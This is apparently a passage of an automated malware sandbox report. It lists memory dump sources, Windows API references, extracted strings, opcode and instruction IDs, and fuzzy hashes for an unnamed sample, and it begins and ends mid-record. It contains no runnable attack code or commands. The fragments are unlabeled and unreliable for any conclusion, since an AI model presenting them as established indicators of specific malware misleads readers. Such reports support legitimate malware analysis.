                                                                                                                                                                                        • FindWindowA.USER32(6C7C9B9F,00000000), ref: 0061143C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.365612488.00000000004EE000.00000040.00020000.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                        • Associated: 00000002.00000002.364563143.0000000000310000.00000002.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364588742.0000000000311000.00000020.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364635392.0000000000334000.00000002.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364661223.0000000000343000.00000004.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364672860.0000000000345000.00000002.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364777805.000000000037F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364788912.0000000000384000.00000002.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.364807453.0000000000385000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365369525.00000000004D6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365388349.00000000004D8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365415645.00000000004DA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365443099.00000000004DC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365470642.00000000004DE000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365485572.00000000004E0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365501404.00000000004E2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365517417.00000000004E4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365538313.00000000004E6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365557682.00000000004E8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365569463.00000000004EA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365595586.00000000004EC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.365660784.0000000000520000.00000040.00020000.sdmp Download File
                                                                                                                                                                                        • Associated: 00000002.00000002.366582589.0000000000673000.00000020.00020000.sdmp Download File
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FindSleepWindow
                                                                                                                                                                                        • String ID: monc$oncl$}~w$5_?
                                                                                                                                                                                        • API String ID: 3078808852-2209174369
                                                                                                                                                                                        • Opcode ID: aa00701d35ad8468efccf10a262afcb5085952843c995a3dc2bcfb1ebdfc9a83
                                                                                                                                                                                        • Instruction ID: d86c173f92d5bf5ce16e455ad6f93d4eaf0f464bbb5703317e32fe37ef7bdb35
                                                                                                                                                                                        • Opcode Fuzzy Hash: aa00701d35ad8468efccf10a262afcb5085952843c995a3dc2bcfb1ebdfc9a83
                                                                                                                                                                                        • Instruction Fuzzy Hash: BD1223F110C204EFE714AF14EC917FAB7E6EF04310F29092EDAC68B640E6355AD69697
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Xor
                                                                                                                                                                                        • API String ID: 0-144955292
                                                                                                                                                                                        • Opcode ID: d46ec74138f33359d42be0efb2880d998f1a5608066bb8d3702d66b3cb83ee36
                                                                                                                                                                                        • Instruction ID: 4c2c9c12f3576eda3d1f46c6a50e116b5bc09ddaa2c5148423cd7c3ff6cae6fa
                                                                                                                                                                                        • Opcode Fuzzy Hash: d46ec74138f33359d42be0efb2880d998f1a5608066bb8d3702d66b3cb83ee36
                                                                                                                                                                                        • Instruction Fuzzy Hash: C192BFB1B042528FCB189BB4D86867E76F3AFC9204F258539D506DB391DF70DC868B92
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: xgl
                                                                                                                                                                                        • API String ID: 0-437820829
                                                                                                                                                                                        • Opcode ID: 97d3c9b80dc86e6fc8185d051cada6c8dbbf9a484a5333f2f9f187791f333ad4
                                                                                                                                                                                        • Instruction ID: 388ef2c4ddac030ad4d953b5a20032a9272f19af1b2efb9c2b8736a10dbdd652
                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d3c9b80dc86e6fc8185d051cada6c8dbbf9a484a5333f2f9f187791f333ad4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE1C2B1614215DFDB159F70C818B6D7AF2AF89300F0146BAEA06EB3A1EF31DD849B50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2s$2s$@jn$@jn$@jn$@jn$@jn$@jn
                                                                                                                                                                                        • API String ID: 0-1750500263
                                                                                                                                                                                        • Opcode ID: 335704cc5a6632b976eec67097384876cbf3c4473604d3256909225029a759b1
                                                                                                                                                                                        • Instruction ID: dc2028a2372f416f20fbd6d64956282d9e83724c24b7b14f3f9fc1462109eba4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 335704cc5a6632b976eec67097384876cbf3c4473604d3256909225029a759b1
                                                                                                                                                                                        • Instruction Fuzzy Hash: E5D14A71A00205DFDB14DF64D884AAEB7B2FF94314F15C929E9199B3A5CB70EC86CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Hrll$Hrll$Hrll
                                                                                                                                                                                        • API String ID: 0-1075072417
                                                                                                                                                                                        • Opcode ID: 18ac080fef732426913b9c1279990303711af0dddaa979659c5e13ce117bb74e
                                                                                                                                                                                        • Instruction ID: c21d5463688f675af00ef4e25498d55a19ab421fbf747ebab056104a1627869e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 18ac080fef732426913b9c1279990303711af0dddaa979659c5e13ce117bb74e
                                                                                                                                                                                        • Instruction Fuzzy Hash: D021B132B042058FCB04EF68D484AAE77F5EF8A204B00462DE506CB726EF30ED45CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: >$?
                                                                                                                                                                                        • API String ID: 0-2520440083
                                                                                                                                                                                        • Opcode ID: 6ca847b9096293319e42d1532e33fba42344e37cd57b700d2d38ba0bccbec424
                                                                                                                                                                                        • Instruction ID: 20f9fd0d7d7961592e2a86c78356b3f694aff906e6471133f548a0592eedd16a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ca847b9096293319e42d1532e33fba42344e37cd57b700d2d38ba0bccbec424
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A41D3F0918249EFCF10CFA4DC496ADBFB1FF46304F1186BAD022AB291D7345A648B65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: >$?
                                                                                                                                                                                        • API String ID: 0-2520440083
                                                                                                                                                                                        • Opcode ID: 674844103e62f053e99580abab04a167d4d58ebc63a841980dbbd2d048cb8f22
                                                                                                                                                                                        • Instruction ID: f56b71f07f4f6ec7ab4bbdd741e91168f0bd5e2a981365abb652acab72d7198c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 674844103e62f053e99580abab04a167d4d58ebc63a841980dbbd2d048cb8f22
                                                                                                                                                                                        • Instruction Fuzzy Hash: 03411CF0928209EFDF14CF95DC486ADBBB1FF46308F50867AD022AA290D7745A648B65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Hrll$Hrll
                                                                                                                                                                                        • API String ID: 0-4006512156
                                                                                                                                                                                        • Opcode ID: 93529d9eca943bf291d9b38e4e391af5928904a189dec0bd141b7e78d413fd74
                                                                                                                                                                                        • Instruction ID: 64bea9e0bc5f7a6ad24c059e5df18a29e63261473822055f88e1619c914f929e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 93529d9eca943bf291d9b38e4e391af5928904a189dec0bd141b7e78d413fd74
                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21D032B083058FDB05AF68D484AAE77B5EF86200B00466EE406CB367EB30A945CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: xgl
                                                                                                                                                                                        • API String ID: 0-437820829
                                                                                                                                                                                        • Opcode ID: 5f4441fee914ff5f65d0d89a2ba19ba7054decb68f54e21b7ab9c8913036fecd
                                                                                                                                                                                        • Instruction ID: 2450be768d611522d68da9882d3bb6b21fe1fc05c10d9c14c2e9279c92eca878
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f4441fee914ff5f65d0d89a2ba19ba7054decb68f54e21b7ab9c8913036fecd
                                                                                                                                                                                        • Instruction Fuzzy Hash: A4A1C4B2A10219DFCB158F60C814AAD7BF2FF49310F4146FADA1AAB261EB31D954DF50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 8clm
                                                                                                                                                                                        • API String ID: 0-2751546213
                                                                                                                                                                                        • Opcode ID: 7c5178772c5d1f999d69442a7e4471fa9de041d50108a5f2ff4326ff39620797
                                                                                                                                                                                        • Instruction ID: ab19e82bfef4dbf6a738b0242eba8e2c9eb50ce8bcd0c9d21d3f05852cd309b9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c5178772c5d1f999d69442a7e4471fa9de041d50108a5f2ff4326ff39620797
                                                                                                                                                                                        • Instruction Fuzzy Hash: 38914CB5600105CFC704EF69E59886DBBF6FF89308B0AC5A9D4069B362EB34E885CB55
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e550138fb4e4f47871f202a062c23c0ecbd26397410fb6a458dafb54f9f8e318
                                                                                                                                                                                        • Instruction ID: 8ce5f4c4f666ca056249abaef56dfe01ad4d8264f73cf6be74e3132e7c72f841
                                                                                                                                                                                        • Opcode Fuzzy Hash: e550138fb4e4f47871f202a062c23c0ecbd26397410fb6a458dafb54f9f8e318
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BD2087A250510EFDB4A8F98D948D55BBB2FF4D32471A81D8F2099B232C732E865EF50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: (>k
                                                                                                                                                                                        • API String ID: 0-2514655903
                                                                                                                                                                                        • Opcode ID: 4ed27315565448a0bc6bd13f3474c94454bf2df72b51265d56ab7d2323c4a12f
                                                                                                                                                                                        • Instruction ID: fbf7eff90a0b6a5a04822b959524560dcc5fa3f5923920f8b133bf0eab2f314d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ed27315565448a0bc6bd13f3474c94454bf2df72b51265d56ab7d2323c4a12f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0641A0B0B00104DFCB54EF64D1584ADBBF6EB89208B15C56ED51A9B391DF31EC42CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: (>k
                                                                                                                                                                                        • API String ID: 0-2514655903
                                                                                                                                                                                        • Opcode ID: 2efde5782716b5c2aa51e6e27ccce1fb50d78903d5f7d33241cea805ce1806cc
                                                                                                                                                                                        • Instruction ID: c2b2ab387ef58e358385efba158fe948bcb3fd9dd1d6a6495e843a4763130efe
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2efde5782716b5c2aa51e6e27ccce1fb50d78903d5f7d33241cea805ce1806cc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5241ADB0B01200DFC718EB64D5685ADBBF6EF89204B15856ED5069B3A2EF31AC42CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: pk
                                                                                                                                                                                        • API String ID: 0-1730594091
                                                                                                                                                                                        • Opcode ID: d095336b0c089c7aaba7869b9fff0093a58c350536ef3f4ea1da36c24acc299e
                                                                                                                                                                                        • Instruction ID: 00a9f20bc5fbd11c1194c3ef82cb73486e0c6c96003347af53bf02fb06f1cd8e
                                                                                                                                                                                        • Opcode Fuzzy Hash: d095336b0c089c7aaba7869b9fff0093a58c350536ef3f4ea1da36c24acc299e
                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21C3707083519FCB069B64E8284693FF6EFC621831649AED509CB6A3EE315C468B61
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $hl
                                                                                                                                                                                        • API String ID: 0-3872147934
                                                                                                                                                                                        • Opcode ID: 50830c55737e242fd9602034509cdf6e256f1c2e12d77a7e16b0675ea3870320
                                                                                                                                                                                        • Instruction ID: 66f23250e1a6f08cbb5c8f76ef2a58e8ee4e8c50f98767af82320f5936ce4d17
                                                                                                                                                                                        • Opcode Fuzzy Hash: 50830c55737e242fd9602034509cdf6e256f1c2e12d77a7e16b0675ea3870320
                                                                                                                                                                                        • Instruction Fuzzy Hash: 622190707402449FEB249B208C16B6A76F2EFC9B05F228579E5059F7A1CB71DC458B91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Xor
                                                                                                                                                                                        • API String ID: 0-144955292
                                                                                                                                                                                        • Opcode ID: c89beff2413ff1e07fe26ae558f49ac07930adc96d4523c04b435274a7fb8e35
                                                                                                                                                                                        • Instruction ID: 0b9be5c9d5598b5579431efb129e950f40de603fc45def3b062865129996d8b7
                                                                                                                                                                                        • Opcode Fuzzy Hash: c89beff2413ff1e07fe26ae558f49ac07930adc96d4523c04b435274a7fb8e35
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B21C4F57102529FCB14EF65C99852ABBF6FF85640B088179E505CB261DB74EC04CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4|r
                                                                                                                                                                                        • API String ID: 0-1731428878
                                                                                                                                                                                        • Opcode ID: a5c96f652c8f34b8fdd505d04cce94fe7f78e8d5a3713de87cf783e2b76033ea
                                                                                                                                                                                        • Instruction ID: c5539f20845395a7950666ae19c6816ff1acd68fabd87da781e68cfe6afda075
                                                                                                                                                                                        • Opcode Fuzzy Hash: a5c96f652c8f34b8fdd505d04cce94fe7f78e8d5a3713de87cf783e2b76033ea
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D11D0307105529BCB48AB34D86846E73EBFFC4205BC44168D50687B90CF30FC168BC1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: pk
                                                                                                                                                                                        • API String ID: 0-1730594091
                                                                                                                                                                                        • Opcode ID: 10c93d73e9ee2331845381e22497c0d4bbff73c7caefd6fc599c4eabc1597ead
                                                                                                                                                                                        • Instruction ID: 2a0ab5540f2e0d990d60973d6cfa97b585265ee9c571e5aa77d395365fafbc56
                                                                                                                                                                                        • Opcode Fuzzy Hash: 10c93d73e9ee2331845381e22497c0d4bbff73c7caefd6fc599c4eabc1597ead
                                                                                                                                                                                        • Instruction Fuzzy Hash: 081106B03042109FCB459F69E85C8AA7BFAEBC5218311496DD509CB763EF325C86CBA1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                        • Opcode ID: fa35be558fd27ed131ceec55502fee5743918d6ba18a7b376a60d5bdf1177388
                                                                                                                                                                                        • Instruction ID: 168c47688780ed19ad2c8fa19052cc7720c10cb99889ee2daf0b81b74d0b4765
                                                                                                                                                                                        • Opcode Fuzzy Hash: fa35be558fd27ed131ceec55502fee5743918d6ba18a7b376a60d5bdf1177388
                                                                                                                                                                                        • Instruction Fuzzy Hash: E9B012051C50C50187010130C070489DF60E54103035FCBE5C0C80C403C08C8083C641
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c198c6ce39c922e1f5fb5efa32f0ee2e2c0e5f49de93ad755a375ccdf0d7e0a1
                                                                                                                                                                                        • Instruction ID: 1743e5f12c3eeb617033de0662deb6b9d2b0f35fb6d54d6934cfc5969d44af4b
                                                                                                                                                                                        • Opcode Fuzzy Hash: c198c6ce39c922e1f5fb5efa32f0ee2e2c0e5f49de93ad755a375ccdf0d7e0a1
                                                                                                                                                                                        • Instruction Fuzzy Hash: A142AFF0901205EFD360CF15E59CA9ABBF2FB41309F5696A9D0159B667C3B6E888CF40
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 8fea554732907ea152d11995f91d2ed86f1ec62ad3beedd19d740ab94bd70d5d
                                                                                                                                                                                        • Instruction ID: 55b9cc85022b5be3692f2d43ab725cacc7b2147a1e66d735da2387fc16831a39
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fea554732907ea152d11995f91d2ed86f1ec62ad3beedd19d740ab94bd70d5d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F327BF0A01601AFD360CF15E55CA9ABBF2FB41309F4696ADD0159B667C3B6D888CF41
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7d7bfdacf6625411dd04b143efb49e221fc1f9f17514da2184288c3645ec48bd
                                                                                                                                                                                        • Instruction ID: 5b8a64dafb4a9577c2a28f9d9b8c4776eaf71d59caced1f07d88b8a8be8b9225
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d7bfdacf6625411dd04b143efb49e221fc1f9f17514da2184288c3645ec48bd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F9194B1A10219DFCF558F60C818AADBBF2BF49310F4146F6EA1AAB261DB31D954DF40
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 9253b8ac9451ae54376bdd4f86115c167a90c90ec704a8a739e90e1f4e5e9d2a
                                                                                                                                                                                        • Instruction ID: c530262ea5e92bb1b41dde0ea9f79d617627a2c185547fecf9f16a1821fbd883
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9253b8ac9451ae54376bdd4f86115c167a90c90ec704a8a739e90e1f4e5e9d2a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 569172B1910219DFCF558F60C818AADBBF2BF49310F4146F6EA1AAB261DB31D954DF40
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 9d1f3b04c82881ef1ed0286b743aa0ba323de8168991eb3b9e23df2c1b9f26e3
                                                                                                                                                                                        • Instruction ID: e48b1805d9cf3102fd4f6103bc16c09be3f61dfa9c6bf949bad947d5f90f8aa5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d1f3b04c82881ef1ed0286b743aa0ba323de8168991eb3b9e23df2c1b9f26e3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F6180F0A14105CFDB04DF94C8946AEB7B2FB86300F15C736D916A7351EB36E9828B52
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 39eb96e64c45b5ad1cb26bde688de7250d054e28dc0a3a1de692daffc7e67bb6
                                                                                                                                                                                        • Instruction ID: 57d193e166586dea8d83e2282afa3bcff594db8eeeaf31d5fbc36050dfd8f837
                                                                                                                                                                                        • Opcode Fuzzy Hash: 39eb96e64c45b5ad1cb26bde688de7250d054e28dc0a3a1de692daffc7e67bb6
                                                                                                                                                                                        • Instruction Fuzzy Hash: BE5135F4A14A46CFDF14CB48C580ABDB3B1FB83305F558A7AD42397244E336E991CA92
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6b97006a76bf6f78f81b4e8a0e24e2702a631c591a679c5727e8bfda2f7966a6
                                                                                                                                                                                        • Instruction ID: 19349df70b3dae9ea3f2950748efa40dd34e2669efa8becbd56e71ce33868ebf
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b97006a76bf6f78f81b4e8a0e24e2702a631c591a679c5727e8bfda2f7966a6
                                                                                                                                                                                        • Instruction Fuzzy Hash: BE519BF8A14245DFCB24CF68C484A6AFBF1FF4A310F10966AE996A7741C734E845CB52
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 2fef1cc78e4ab8288a12c52770ceed7d28f12a7b807b3decc4d2df38b4578a0d
                                                                                                                                                                                        • Instruction ID: e80eb7106779b71251df2e26d8c29180f9d286cd11fb38353bde52ba643e91e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fef1cc78e4ab8288a12c52770ceed7d28f12a7b807b3decc4d2df38b4578a0d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D417CF5714206DFCB14DE64C890B6EF7A2FB86310F109A3AE626AB244C731E851CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 2ff8953b5c533643f922048942695d0fe23f63358be0665c4f1806b21da837b4
                                                                                                                                                                                        • Instruction ID: 6a04f10afc38c9b3f2da2c7475f6b53d57d702735043363650cad7fb79a78b61
